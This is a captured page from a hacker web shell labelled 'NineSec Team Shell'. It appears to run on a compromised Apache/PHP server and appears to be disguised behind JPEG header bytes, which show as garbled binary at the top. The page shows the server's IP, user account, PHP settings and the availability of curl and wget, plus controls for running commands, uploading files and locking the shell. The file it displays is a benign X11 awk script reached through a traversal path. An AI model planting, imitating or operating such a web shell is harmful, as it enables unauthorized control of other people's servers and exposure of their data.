�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /etc/ldap/../etckeeper/../../usr/lib/ruby/../python2.7/../X11/x11perfcomp/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //etc/ldap/../etckeeper/../../usr/lib/ruby/../python2.7/../X11/x11perfcomp/perfratio
#!/bin/sh
awk '
/^     1/ && READY == 0 {	printf ("       1   ");
		for (i = 2; i < NF; i++)
			printf ("       %2d   ", i);
		printf ("    Operation\n");
		next;
	}
/^---/	{ 	printf ("------------");
		for (i = 2; i < NF; i++)
			printf ("  ----------");
		printf ("   ---------\n");
		READY=1; next;
 	}
READY==1 {
		base=$1;
		printf ("%12.1f", base);
		for (i = 2; i < '$1'; i++) {
			if (base == 0)
				printf ("   lots ", $i);
			else {
				rate=$i/base;
				printf ("  %10.3f", rate);
			}
		}
		printf ("   ");
		for (; i <= NF; i++)
		{
			printf ("%s ", $i);
		}
		printf ("\n");
		next;
	   }
	   { print $0; }
'

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
April 25 2020 3:53:29
root
0755
Xmark
26.632 KB
February 29 2020 12:10:29
root
0755
fillblnk
0.414 KB
February 29 2020 12:10:29
root
0755
perfboth
0.653 KB
February 29 2020 12:10:29
root
0755
perfratio
0.609 KB
February 29 2020 12:10:29
root
0755

NineSec Team - 2022